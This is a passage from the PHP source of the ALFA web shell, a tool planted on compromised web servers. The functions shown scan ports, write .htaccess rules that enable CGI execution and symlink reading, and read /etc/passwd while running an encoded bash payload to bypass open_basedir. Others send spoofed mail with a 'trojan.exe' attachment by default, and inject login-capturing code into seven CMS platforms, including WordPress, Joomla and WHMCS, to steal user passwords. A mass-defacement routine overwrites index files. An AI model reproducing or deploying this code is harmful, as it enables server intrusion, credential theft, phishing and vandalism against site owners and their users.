5568if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){
5569echo __pre();
5570$packetContent = "GET / HTTP/1.1\r\n\r\n";
5571if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);
5572else{
5573$packetContent = str_replace(array("\r","\n"), "", $packetContent);
5574$packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent);
5575}
5576for($i = $start; $i<=$end; $i++){
5577$sock = @fsockopen($host, $i, $errno, $errstr, 3);
5578if($sock){
5579stream_set_timeout($sock, 5);
5580fwrite($sock, $packetContent."\r\n\r\n\x00");
5581$counter = 0;
5582$maxtry = 1;
5583$bin = "";
5584do{
5585$line = fgets($sock, 1024);
5586if(trim($line)=="")$counter++;
5587$bin .= $line;
5588}while($counter<$maxtry);
5589fclose($sock);
5590echo "<center><p>Port <font style='color:#DE3E3E'>$i</font> is open</p>";
5591echo "<p><textarea style='height:140px;width:50%;'>".$bin."</textarea></p></center>";
5592}
5593flush();
5594}
5595}
5596echo '</div>';
5597alfafooter();
5598}
5599function alfacgihtaccess($m,$d='', $symname=false){
5600$readme = "";
5601if($symname){$readme="\nReadmeName ".trim($symname);}
5602if($m=='cgi'){
5603$code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
5604}elseif($m=='sym'){
5605$code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
5606}elseif($m=='shtml'){
5607$code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
5608}
5609@__write_file($d.'.htaccess',$code);
5610}
5611function alfabasedir(){
5612alfahead();
5613echo '<div class=header>
5614<center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>';
5615$passwd = _alfa_file('/etc/passwd');
5616if(is_array($passwd)){
5617$users = array();
5618$makepwd = alfaMakePwd();
5619$basedir = @ini_get('open_basedir');
5620$safe_mode = @ini_get('safe_mode');
5621if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){
5622$bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
5623alfaWriteTocgiapi("basedir.alfa",$bash);
5624$bash_users = alfaEx("cd alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true);
5625$users = json_decode($bash_users, true);
5626$x=count($users);
5627if($x>=2){array_pop($users);--$x;}
5628}
5629if(!$basedir&&!$safe_mode){
5630$x=0;
5631foreach($passwd as $str){
5632$pos = strpos($str,':');
5633$username = substr($str,0,$pos);
5634$dirz = str_replace("{user}", $username, $makepwd);
5635if(($username != '')){
5636if (@is_readable($dirz)){
5637array_push($users,$username);
5638$x++;
5639}}}
5640}
5641echo '<br><br>';
5642echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."<br /></font></b>";
5643echo "<b><font color=\"#FFFFFF\">[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."<br /></font></b>";
5644echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
5645foreach($users as $user){
5646if(empty($user))continue;
5647$path = str_replace("{user}", $user, $makepwd);
5648echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
5649}
5650}else{echo('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>');}
5651echo '<br><br></b>';
5652echo '</div>';
5653alfafooter();
5654}
5655function alfamail(){
5656alfahead();
5657echo '<div class=header>';
5658AlfaNum(8,9,10);
5659echo '<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\'mail\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\'>>\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">';
5660$table = array(
5661'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true),
5662'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true),
5663'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'),
5664'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'),
5665'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60')
5666);
5667create_table($table);
5668echo '<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>';
5669if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){
5670$mail_to = $_POST['alfa1'];
5671$mail_from = $_POST['alfa2'];
5672$mail_subject = $_POST['alfa3'];
5673$mail_content = $_POST['alfa5'];
5674$count_mail = (int)$_POST['alfa6'];
5675$mail_attach = $_POST['alfa7'];
5676if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){
5677if(!empty($mail_attach)&&@is_file($mail_attach)){
5678$file = $mail_attach;
5679$content = __read_file($file);
5680$content = chunk_split(__ZW5jb2Rlcg($content));
5681$uid = md5(uniqid(time()));
5682$filename = basename($file);
5683$headers = "From: ".$mail_from." <".$mail_from.">\r\n";
5684$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
5685$headers .= "Reply-To: ".$mail_from."\r\n";
5686$headers .= "Content-Type: multipart/mixed; boundary=\"".$uid."\"\r\n\r\n";
5687$headers .= 'MIME-Version: 1.0' . "\r\n";
5688$headers .= 'X-Mailer: php' . "\r\n";
5689$mail_content = "--".$uid."\r\n";
5690$mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
5691$mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
5692$mail_content .= $mail_content."\r\n\r\n";
5693$mail_content .= "--".$uid."\r\n";
5694$mail_content .= "Content-Type: application/octet-stream; name=\"".$filename."\"\r\n";
5695$mail_content .= "Content-Transfer-Encoding: base64\r\n";
5696$mail_content .= "Content-Disposition: attachment; filename=\"".$filename."\"\r\n\r\n";
5697$mail_content .= $content."\r\n\r\n";
5698$mail_content .= "--".$uid."--";
5699}else{
5700$headers = "From: " . $mail_from. " ( ".$mail_from." ) \r\n";
5701$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
5702$headers .= 'Reply-To: '.$mail_from.'' . "\r\n";
5703$headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";
5704$headers .= 'MIME-Version: 1.0' . "\r\n";
5705$headers .= 'X-Mailer: php' . "\r\n";
5706}
5707if(empty($count_mail)||$count_mail<1)$count_mail=1;
5708if(!empty($mail_from)){echo __pre();
5709for($i=1;$i<=$count_mail;$i++){
5710if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("<center>Sent -> $mail_to<br></center>");
5711}}else{__alert("Invalid Mail From !");}
5712}else{__alert("Invalid Mail To !");}
5713}
5714echo('</div>');
5715alfafooter();
5716}
5717function alfaziper(){
5718alfahead();
5719AlfaNum(8,9,10);
5720echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
5721<form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
5722<div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['cwd']).'" size="60"/>
5723<div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'alfa.zip" size="60"/>
5724<input type="submit" value=" " name="ziper" />
5725</form></center></p>';
5726if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
5727$dirzip = $_POST['alfa3'];
5728$zipfile = $_POST['alfa4'];
5729if (class_exists('ZipArchive')&&($GLOBALS['sys']!='unix'||!_alfa_can_runCommand(true,true))){
5730$code='if(!extension_loaded(\'zip\')||!file_exists($source)){return false;}$zip=new ZipArchive();if(!$zip->open($destination,ZIPARCHIVE::CREATE)){return false;}$source=str_replace(\'\\\\\',\'/\',realpath($source));if(is_dir($source)===true){$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);foreach($files as $file){$file=str_replace(\'\\\\\',\'/\',$file);if(in_array(substr($file,strrpos($file,\'/\')+1),array(\'.\',\'..\')))continue;$file=realpath($file);if(is_dir($file)===true){$zip->addEmptyDir(str_replace($source.\'/\',\'\',$file.\'/\'));}else if(is_file($file)===true){$zip->addFromString(str_replace($source.\'/\',\'\',$file),file_get_contents($file));}}}else if(is_file($source)===true){$zip->addFromString(basename($source),file_get_contents($source));}return $zip->close();';
5731$newfunc = create_function('$source,$destination', $code);
5732if($newfunc($dirzip, $zipfile)){
5733echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font></p></center>';
5734}else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
5735}else{
5736alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."' > /dev/null &");
5737echo __pre().'<center><p>Please Wait For 1 minutes AND Check this -> <b><font color="green">'.$zipfile.'</font></b><br>Because We Executed The Command in The background !</p></center>';
5738}}
5739echo '</div>';
5740alfafooter();
5741}
5742function alfacmshijacker(){
5743alfahead();
5744AlfaNum(5,6,7,8,9,10);
5745echo '<div class=header><br>
5746<center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\'cmshijacker\',null,this.cmshi.value,this.saveto.value,\'>>\',this.cmspath.value);return false;" method=\'post\'>
5747<div class="txtfont">CMS: <select style="width:100px;" name="cmshi">';
5748$cm_array = array("vb"=>"vBulletin","wp"=>"wordpress","jom"=>"joomla","whmcs"=>"whmcs","mybb"=>"mybb","ipb"=>"ipboard","phpbb"=>"phpbb");
5749foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
5750echo("</select>");
5751echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
5752SaveTo: <input size="50" type="text" name="saveto" value="'.$GLOBALS['cwd'].'alfa.txt"></font>
5753<input type="submit" name="btn" value=" "></form></center><br>';
5754$cms = $_POST['alfa1'];
5755$saveto = $_POST['alfa2'];
5756$cmspath = $_POST['alfa4'];
5757if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){
5758echo __pre();
5759alfaHijackCms($cms,$cmspath,$saveto);
5760}
5761echo '</div>';
5762alfafooter();
5763}
5764function alfaHijackCms($cms,$cmspath,$saveto){
5765switch($cms){
5766case "vb":
5767hijackvBulletin($cmspath,$saveto);
5768break;
5769case "wp":
5770hijackwp($cmspath,$saveto);
5771break;
5772case "jom":
5773hijackJoomla($cmspath,$saveto);
5774break;
5775case "whmcs":
5776hijackWhmcs($cmspath,$saveto);
5777break;
5778case "mybb":
5779hijackMybb($cmspath,$saveto);
5780break;
5781case "ipb":
5782hijackIPB($cmspath,$saveto);
5783break;
5784case "phpbb":
5785hijackPHPBB($cmspath,$saveto);
5786break;
5787default:
5788echo "error!";
5789break;
5790}
5791}
5792function hijackvBulletin($path,$saveto){
5793$code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' . $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
5794$clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
5795$code=str_replace('{saveto_path}',$saveto,$code);
5796$login = $path."/login.php";
5797$class = $path."/includes/class_bootstrap.php";
5798$dologin = 'do_login_redirect();';
5799$evil_login = "\t".$code."\n\t".$dologin;
5800$evil_class = "true";
5801if(@is_file($login) AND @is_writable($login) AND @is_file($class) AND @is_writable($class)){
5802$data_login = @file_get_contents($login);
5803$data_class = @file_get_contents($class);
5804if(strstr($data_login, $dologin) AND strstr($data_class, $clearpw)){
5805$login_replace = str_replace($dologin,$evil_login, $data_login);
5806$class_replace = str_replace($clearpw,$evil_class, $data_class);
5807@file_put_contents($login, $login_replace);
5808@file_put_contents($class, $class_replace);
5809hijackOutput(0,$saveto);
5810}else{
5811hijackOutput(1);
5812}
5813}else{
5814hijackOutput(1);
5815}
5816}
5817function hijackwp($path,$saveto){
5818$code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
5819$redirect_wp = 'if ( !is_wp_error($user) && !$reauth ) {';
5820$code=str_replace('{saveto_path}',$saveto,$code);
5821$login=$path."/wp-login.php";
5822$evil_login = "\t".$redirect_wp."\n\t".$code;
5823if(@is_file($login) AND @is_writable($login)){
5824$data_login = @file_get_contents($login);
5825if(strstr($data_login, $redirect_wp)){
5826$login_replace = str_replace($redirect_wp,$evil_login, $data_login);
5827@file_put_contents($login, $login_replace);
5828hijackOutput(0,$saveto);
5829}else{
5830hijackOutput(1);
5831}
5832}else{
5833hijackOutput(1);
5834}
5835}
5836function hijackJoomla($path,$saveto){
5837$code = '<?php jimport(\'joomla.user.authentication\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
5838$code=str_replace('{saveto_path}',$saveto,$code);
5839$comp=$path."/administrator/components/com_login/";
5840if(@is_file($comp."/login.php")){
5841$login = $comp."/login.php";
5842}elseif(@is_file($comp."/admin.login.php")){
5843$login = $comp."/admin.login.php";
5844}else{
5845$login = '';
5846}
5847if(@is_file($login) AND @is_writable($login) AND $login != ''){
5848$data_login = @file_get_contents($login);
5849$evil_login = $code."\n".$data_login;
5850@file_put_contents($login, $evil_login);
5851hijackOutput(0,$saveto);
5852}else{
5853hijackOutput(1);
5854}
5855}
5856function hijackWhmcs($path,$saveto){
5857$code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' . $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
5858$code=str_replace('{saveto_path}',$saveto,$code);
5859$conf=$path."/configuration.php";
5860if(@is_file($conf) AND @is_writable($conf)){
5861$data_conf = @file_get_contents($conf);
5862if(!strstr($data_conf,'?>'))$code = '?>'.$code;
5863$evil_conf = $data_conf."\n".$code;
5864@file_put_contents($conf, $evil_conf);
5865hijackOutput(0,$saveto);
5866}else{
5867hijackOutput(1);
5868}
5869}
5870function hijackMybb($path,$saveto){
5871$code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
5872$find = '$loginhandler->complete_login();';
5873$code=str_replace('{saveto_path}',$saveto,$code);
5874$login=$path."/member.php";
5875$evil_login = "\t".$code."\n\t".$find;
5876if(@is_file($login) AND @is_writable($login)){
5877$data_login = @file_get_contents($login);
5878if(strstr($data_login, $find)){
5879$login_replace = str_replace($find,$evil_login, $data_login);
5880@file_put_contents($login, $login_replace);
5881hijackOutput(0,$saveto);
5882}else{
5883hijackOutput(1);
5884}
5885}else{
5886hijackOutput(1);
5887}
5888}
5889function hijackIPB($path,$saveto){
5890$code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
5891$find = 'unset( $member[\'plainPassword\'] );';
5892$code=str_replace('{saveto_path}',$saveto,$code);
5893$login=$path."/admin/sources/handlers/han_login.php";
5894$evil_login = "\t".$find."\n\t".$code;
5895if(@is_file($login) AND @is_writable($login)){
5896$data_login = @file_get_contents($login);
5897if(strstr($data_login, $find)){
5898$login_replace = str_replace($find,$evil_login, $data_login);
5899@file_put_contents($login, $login_replace);
5900hijackOutput(0,$saveto);
5901}else{
5902hijackOutput(1);
5903}
5904}else{
5905hijackOutput(1);
5906}
5907}
5908function hijackPHPBB($path,$saveto){
5909$code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
5910$find = 'case \'login\':';
5911$code=str_replace('{saveto_path}',$saveto,$code);
5912$login=$path."/ucp.php";
5913$evil_login = "\t".$find."\n\t".$code;
5914if(@is_file($login) AND @is_writable($login)){
5915$data_login = @file_get_contents($login);
5916if(strstr($data_login, $find)){
5917$login_replace = str_replace($find,$evil_login, $data_login);
5918@file_put_contents($login, $login_replace);
5919hijackOutput(0,$saveto);
5920}else{
5921hijackOutput(1);
5922}
5923}else{
5924hijackOutput(1);
5925}
5926}
5927function hijackOutput($c=0,$p=''){echo($c==0?"<center><font color='green'>Success</font> --> path: $p</center>":'<center><font color="red">Error in inject code !</font></center>');}
5928function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){
5929if(@is_dir($dir)){
5930$files=@scandir($dir);
5931foreach($files as $key => $value){
5932$path=@realpath($dir. DIRECTORY_SEPARATOR .$value);
5933if(!@is_dir($path)){
5934if($ext!='*'){$f = basename($path);$f = explode('.',$f);$f = end($f);if($f!=$ext)continue;}
5935if($e=='str'){
5936$content = @file_get_contents($path);
5937if(strpos($content, $string) !== false){
5938echo str_replace('\\','/',$path) . "<br>";
5939}
5940}else{
5941if(strstr($value,$string)){
5942echo str_replace('\\','/',$path) . "<br>";
5943}
5944}
5945$results[] = $path;
5946}elseif($value != "." && $value != "..") {
5947Alfa_StrSearcher($path,$string,$ext,$e,$results);
5948$results[] = $path;
5949}}}}
5950function alfasearcher(){
5951alfahead();
5952echo '<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\'searcher\',null,\'file\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\'searcher\',null,\'str\')">| Find Files By Name | </a></h3></center>';
5953if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){
5954echo '<center><div class="txtfont_header">| Find Readable Or Writable Files |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
5955<div class="txtfont">
5956Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
5957Dir: <input size="50" id="target" type="text" name="filename" value="'.$GLOBALS['cwd'].'">
5958Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
5959<input type="submit" name="btn" value=" "></div></form></center><br>';
5960$dir = $_POST['alfa2'];
5961$ext = $_POST['alfa3'];
5962$method = $_POST['alfa4'];
5963if($_POST['alfa5']=='>>'){
5964echo __pre();
5965if(substr($dir,-1)=='/')$dir=substr($dir,0,-1);
5966Alfa_Searcher($dir,trim($ext),$method);
5967}
5968}
5969if($_POST['alfa1']=='str'){
5970echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
5971<div class="txtfont">
5972Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
5973String: <input type="text" name="string" value="">
5974Dir: <input size="50" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
5975Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
5976<input type="submit" name="btn" value=" "></div></form></center><br>';
5977$dir = $_POST['alfa2'];
5978$string = $_POST['alfa3'];
5979$ext = $_POST['alfa5'];
5980if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){
5981echo __pre();
5982Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
5983}
5984}
5985echo '</div>';
5986alfafooter();
5987}
5988function alfaMassDefacer(){
5989alfahead();
5990AlfaNum(5,6,7,8,9,10);
5991echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
5992echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
5993 Mass dir: <input size="50" id="target" type="text" name="massdir" value="'.htmlspecialchars($GLOBALS['cwd']).'">
5994 DefPage: <input size="50" type="text" name="defpage" value="'.htmlspecialchars($GLOBALS['cwd']).'"></div> <input type="submit" name="btn" value=" "></center></p>
5995</form>';
5996$dir = $_POST['alfa1'];
5997$defpage = $_POST['alfa2'];
5998$method = $_POST['alfa3'];
5999$fCurrent = $GLOBALS['__file_path'];
6000if($_POST['alfa4'] == '>>'){
6001if(!empty($dir)){
6002if(@is_dir($dir)){
6003if(@is_readable($dir)){
6004if(@is_file($defpage)){
6005if($dh = @opendir($dir)){
6006echo __pre();
6007while (($file = @readdir($dh)) !== false){
6008if($file == '..' || $file == '.')continue;
6009$newfile=$dir.$file;
6010if($fCurrent == $newfile)continue;
6011if(@is_dir($newfile)){
6012Alfa_ReadDir($newfile,$method,$defpage);
6013}else{
6014if(!@is_writable($newfile))continue;
6015if(!@is_readable($newfile))continue;
6016Alfa_Rewriter($newfile,$file,$defpage,$method);
6017}
6018}
6019closedir($dh);
6020}else{__alert('<font color="red">Error In OpenDir...</font>');}
6021}else{__alert('<font color="red">DefPage File NotFound...</font>');}
6022}else{__alert('<font color="red">Directory is not Readable...</font>');}
6023}else{__alert('<font color="red">Mass Dir is Invalid Dir...</font>');}
6024}else{__alert('<font color="red">Dir is Empty...</font>');}
6025}
6026echo '</div>';
6027alfafooter();
6028}
6029function Alfa_ReadDir($dir,$method='',$defpage=''){
6030if(!@is_readable($dir)) return false;
6031if (@is_dir($dir)) {
6032if ($dh = @opendir($dir)) {
6033while(($file=readdir($dh))!==false) {
6034if($file == '..' || $file == '.')continue;
6035$newfile=$dir.'/'.$file;
6036if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
6037if(@is_file($newfile)){
6038if(!@is_readable($newfile))continue;
6039Alfa_Rewriter($newfile,$file,$defpage,$method);
6040}
6041}
6042closedir($dh);
6043}
6044}
6045}
6046function Alfa_Rewriter($dir,$file,$defpage,$m='index'){
6047if(!@is_writable($dir)) return false;
6048if(!@is_readable($dir)) return false;
6049$defpage=@file_get_contents($defpage);
6050if($m == 'index'){
6051$indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');
6052if(in_array(strtolower($file),$indexs)){
6053@file_put_contents($dir,$defpage);
6054echo @is_file($dir)?$dir."<b><font color='red'>DeFaced...</b></font><br>" : '';
6055}
6056}elseif($m=='all'){
6057@file_put_contents($dir,$defpage);
6058echo @is_file($dir)?$dir." <b><font color='red'>DeFaced...</b></font><br>" : '';
6059}
6060}
6061function alfaGetDisFunc(){
6062alfahead();
6063echo '<div class="header">';
6064$disfun = @ini_get('disable_functions');
6065$s = explode(',',$disfun);
6066$f = array_unique($s);
6067echo '<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>';
6068$i=1;
6069foreach($f as $s){
6070$s=trim($s);
6071if(function_exists($s)||!is_callable($s))continue;
6072echo '<tr><td align="center" style="background-color: black;">'.$i.'</td>';
6073echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.'.str_replace('_','-',$s).'.php"><span class="disable_functions"><b>'.$s.'</b></span></a></td>';
6074$i++;
6075}
6076echo '</table></center>';
6077echo '</div>';
6078alfafooter();
6079}
6080function Alfa_Create_A_Tag($action,$vals){
6081$nulls = array();
6082foreach($vals as $key => $val){
6083echo '<a href=javascript:void(0) onclick="g(\''.$action.'\',';
6084for($i=1;$i<=$val[1]-1;$i++)$nulls[] = 'null';
6085$f = implode(',',$nulls);
6086echo $f.',\''.$val[0].'\');return false;">| '.$key.' | </a>';
6087unset($nulls);
6088}
6089}
6090function Alfa_Searcher($dir, $ext, $method) {
6091if(@is_readable($dir)){
6092if($method == 'all')$ext = '*';
6093if($method == 'dirs')$ext = '*';
6094$globFiles = @glob("$dir/*.$ext");
6095$globDirs = @glob("$dir/*", GLOB_ONLYDIR);
6096$blacklist = array();
6097foreach ($globDirs as $dir) {
6098if(!@is_readable($dir)) continue;
6099@Alfa_Searcher($dir, $ext, $method);
6100}
6101switch($method){
6102case "files":
6103foreach ($globFiles as $file){
6104if(@is_writable($file)){
6105echo "$file<br>";
6106}
6107}
6108break;
6109case "dirs":
6110foreach ($globFiles as $file){
6111if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){
6112echo dirname($file).'<br>';
6113$blacklist[] = dirname($file);
6114}
6115}
6116break;
6117case "all":
6118foreach ($globFiles as $file){
6119echo $file.'<br>';
6120}
6121break;
6122}
6123unset($blacklist);
6124}
6125}
6126function AlfaiFrameCreator($f,$width='100%',$height='600px'){
